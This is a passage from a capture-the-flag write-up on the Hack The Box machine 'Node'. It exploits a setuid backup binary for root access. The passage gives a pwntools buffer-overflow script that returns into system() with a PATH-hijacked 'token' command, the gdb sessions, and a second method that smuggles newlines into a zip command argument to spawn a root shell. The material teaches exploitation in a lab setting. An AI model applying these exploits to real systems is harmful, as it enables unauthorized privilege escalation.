("s1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7"...) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x31724130 in ?? () gdb-peda$ quit u505@kali:~/HTB/Machines/Node$ /usr/bin/msf-pattern_offset -q 0x31724130 [*] Exact match at offset 512
As expected the offset value is 512 (the local variable length is 508).
EIP control
We build the skeleton of our exploit controlling the value of EIP.
u505@kali:~/HTB/Machines/Node$ cat exploit_deadc0de.py
#!/usr/bin/python
from pwn import *
junk = 'D'*512
eip=0xdeadc0de
after = 'U'*8
payload = junk + p32(eip) + after
print payload
#file = open("payload","w")
#file.write (payload)
#file.close()
And run it on gdb
gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_deadc0de.py` Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_deadc0de.py`
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒▒▒UUUUUUUU
Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x22f EBX: 0xff881f90 --> 0x4 ECX: 0x0 EDX: 0x804938b --> 0x712d00 () ESI: 0xf7f70000 --> 0x1dfd6c EDI: 0xff881edf --> 0x796500 () EBP: 0x44444444 ('DDDD') ESP: 0xff880eb0 ("UUUUUUUU") EIP: 0xdeadc0de EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0xdeadc0de [------------------------------------stack-------------------------------------] 0000| 0xff880eb0 ("UUUUUUUU") 0004| 0xff880eb4 ("UUUU") 0008| 0xff880eb8 --> 0x8499500 --> 0x0 0012| 0xff880ebc --> 0x8048a1b (<main+30>: sub esp,0xc) 0016| 0xff880ec0 --> 0x0 0020| 0xff880ec4 --> 0x0 0024| 0xff880ec8 --> 0x0 0028| 0xff880ecc --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0xdeadc0de in ?? ()
As expected, the bufferoverflow occurs with Instruction register value 0xdeadc0de,and the stack contains 8 U.
Exploitation strategy
The executable declares several library functions. These functions are directly accessible with a valid program address.
gdb-peda$ elfsymbol Found 24 symbols strstr@plt = 0x80485e0 strcmp@plt = 0x80485f0 strcspn@plt = 0x8048610 fgets@plt = 0x8048620 fclose@plt = 0x8048630 time@plt = 0x8048640 geteuid@plt = 0x8048650 strcat@plt = 0x8048660 strcpy@plt = 0x8048670 getpid@plt = 0x8048680 puts@plt = 0x8048690 system@plt = 0x80486a0 clock@plt = 0x80486b0 exit@plt = 0x80486c0 srand@plt = 0x80486d0 strchr@plt = 0x80486e0 __libc_start_main@plt = 0x80486f0 fopen@plt = 0x8048700 strncpy@plt = 0x8048710 access@plt = 0x8048730 setuid@plt = 0x8048740 sprintf@plt = 0x8048750 remove@plt = 0x8048760 __gmon_start__@plt = 0x8048770
There are calls to system and exit from the program, so we can use them directly. We also need a string that can be used as a command.
The string "Validated access token" is a good candidate as command to be called. The word token could be a valid command.
gdb-peda$ find token Searching for 'token' in: None ranges Found 6 results, display max 6 items: backupnode : 0x8049875 ("token") libc : 0xf7f1dd34 ("token.type)") ld-2.30.so : 0xf7fc5986 ("token") ld-2.30.so : 0xf7fc5d5f ("token substitution\n") ld-2.30.so : 0xf7fc5d89 ("token substitution") [stack] : 0xff880ac9 ("token") gdb-peda$ x/s 0x8049875 0x8049875: "token" gdb-peda$ x/6x 0x8049875 0x8049875: 0x74 0x6f 0x6b 0x65 0x6e 0x00 gdb-peda$ x/6d 0x8049875 0x8049875: 116 111 107 101 110 0
The address 0x8049875 contains the word token and it's followed by a null character.
u505@kali:~/HTB/Machines/Node$ cat exploit_token.py #!/usr/bin/python from pwn import * junk = 'D'*512 eip=0xdeadc0de systemadd=0x80486a0 exitaddr=0x80486c0 tokenaddr=0x8049875
payload = junk + p32(systemadd) + p32(exitaddr) + p32(tokenaddr) print payload #file = open("payload","w") #file.write (payload) #file.close()
First try in gdb.
gdb-peda$ r abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_token.py` Starting program: /opt/HTB/Machines/Node/backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `python exploit_token.py`
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒u▒ [Attaching after process 9162 vfork to child process 9165] [New inferior 2 (process 9165)] [Detaching vfork parent process 9162 after child exec] [Inferior 1 (process 9162) detached] process 9165 is executing new program: /usr/bin/dash sh: 1: token: not found [Inferior 2 (process 9165) exited with code 0177] Warning: not running
And as expected, a new shell ran and try to execute the command token, that is obviously not found.
Final test
First we set same permissions to backup program as the target program.
u505@kali:~/HTB/Machines/Node$ sudo chown root backupnode u505@kali:~/HTB/Machines/Node$ sudo chmod 4755 backupnode u505@kali:~/HTB/Machines/Node$ ls -l backupnode -rwsr-xr-x 1 root u505 16484 May 15 20:25 backupnode
We create a file name token.
u505@kali:~/HTB/Machines/Node$ echo whoami > token u505@kali:~/HTB/Machines/Node$ chmod +x token u505@kali:~/HTB/Machines/Node$ token -bash: token: command not found
The command is not found, because it's not in the PATH.
u505@kali:~/HTB/Machines/Node$ echo $PATH
/home/u505/.local/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
u505@kali:~/HTB/Machines/Node$ export PATH=`pwd`:$PATH
u505@kali:~/HTB/Machines/Node$ echo $PATH
/home/u505/HTB/Machines/Node:/home/u505/.local/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
u505@kali:~/HTB/Machines/Node$ token
u505
Now our command "token" works, we modify our exploit script to write the payload to file.
u505@kali:~/HTB/Machines/Node$ echo /bin/bash > token u505@kali:~/HTB/Machines/Node$ cat exploit_token.py #!/usr/bin/python from pwn import * junk = 'D'*512 eip=0xdeadc0de systemadd=0x80486a0 exitaddr=0x80486c0 tokenaddr=0x8049875
payload = junk + p32(systemadd) + p32(exitaddr) + p32(tokenaddr) #print payload file = open("payload","w") file.write (payload) file.close() u505@kali:~/HTB/Machines/Node$ python exploit_token.py u505@kali:~/HTB/Machines/Node$ ls -l payload -rw-r--r-- 1 u505 u505 524 May 20 21:50 payload
We execute our exploit.
u505@kali:~/HTB/Machines/Node$ ./backupnode abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `cat payload`
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒u▒ kali:~/HTB/Machines/Node# id uid=0(root) gid=1000(u505) groups=1000(u505),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),120(scanner) kali:~/HTB/Machines/Node# exit exit
Exploitation on target
Copy of our payload
u505@kali:~/HTB/Machines/Node$ scp payload mark@node.htb:/tmp/ mark@node.htb's password: payload 100% 524 13.0KB/s 00:00
From the target:
tom@node:/tmp$ ls -l payload ls -l payload -rw-r--r-- 1 mark mark 524 May 16 04:01 payload tom@node:/tmp$ echo "/bin/bash" >/tmp/token echo "/bin/bash" >/tmp/token tom@node:/tmp$ chmod +x /tmp/token chmod +x /tmp/token tom@node:/tmp$ export PATH=`pwd`:$PATH export PATH=`pwd`:$PATH
And we execute the exploit.
tom@node:/tmp$ /usr/local/bin/backup abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `cat payload` <e72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 `cat payload`
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[+] Validated access token [+] Starting archiving DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD▒u▒ To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details.
root@node:/tmp# id id uid=0(root) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin) root@node:/tmp# cat /root/root.txt cat /root/root.txt <ROOT_FLAG>
Alternative Abuse folder name
The character \n (Carriage return) is not in the list of prohibited characters.
/usr/bin/zip -r -P magicword tempfile folder > /dev/null
If we can convert the command to
/usr/bin/zip -r -P magicword tempfile payload
/bin/bash
echo this command is invisible > /dev/null
We should gain root access. The last line is because /dev/null would redirect our shell to /dev/null if we do not add a third line and shell responses would be invisible.The $ is interpreted by our shell, and not send to the program ($ is a prohibited chraracter).
tom@node:/tmp$ /usr/local/bin/backup abc 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'payload \n /bin/bash \n echo this command is invisble')" < "$(printf 'payload \n /bin/bash \n echo this command is invisble')"
____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'
[+] Validated access token [+] Starting archiving payload /bin/bash echo this command is invisble adding: payload (deflated 96%) To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details.
root@node:/tmp# cat /root/root.txt cat /root/root.txt <ROOT_FLAG> root@node:/tmp# exit exit exit [+] Finished! Encoded backup is below:
UEsDBBQACQAIACwgsFDNhrgUHwAAAAwCAAAHABwAcGF5bG9hZFVUCQADg1e/XpNXv151eAsAAQTpAwAABOkDAAAP1w5OY0DzOHuxQyVtcnwZCpJgAIypSvOoc5EhfFSNUEsHCM2GuBQfAAAADAIAAFBLAQIeAxQACQAIACwgsFDNhrgUHwAAAAwCAAAHABgAAAAAAAAAAACkgQAAAABwYXlsb2FkVVQFAAODV79edXgLAAEE6QMAAATpAwAAUEsFBgAAAAABAAEATQAAAHAAAAAAAA==
Really, we don't need the printf function, we can do it directly on the command line adding returns between " "
tom@node:/tmp$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "payload > /bin/sh > echo junk" adding: payload (deflated 96%) # id uid=0(root) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin) # exit UEsDBBQACQAIACwgsFDNhrgUHwAAAAwCAAAHABwAcGF5bG9hZFVUCQADg1e/XpNXv151eAsAAQTpAwAABOkDAADtx+YFsJWsrYh3pL6S28VuplrALHCzh4x3SkL8gzccUEsHCM2GuBQfAAAADAIAAFBLAQIeAxQACQAIACwgsFDNhrgUHwAAAAwCAAAHABgAAAAAAAAAAACkgQAAAABwYXlsb2FkVVQFAAODV79edXgLAAEE6QMAAATpAwAAUEsFBgAAAAABAAEATQAAAHAAAAAAAA==
References
Daniel Simao 19:21, 16 May 2020 (EDT)
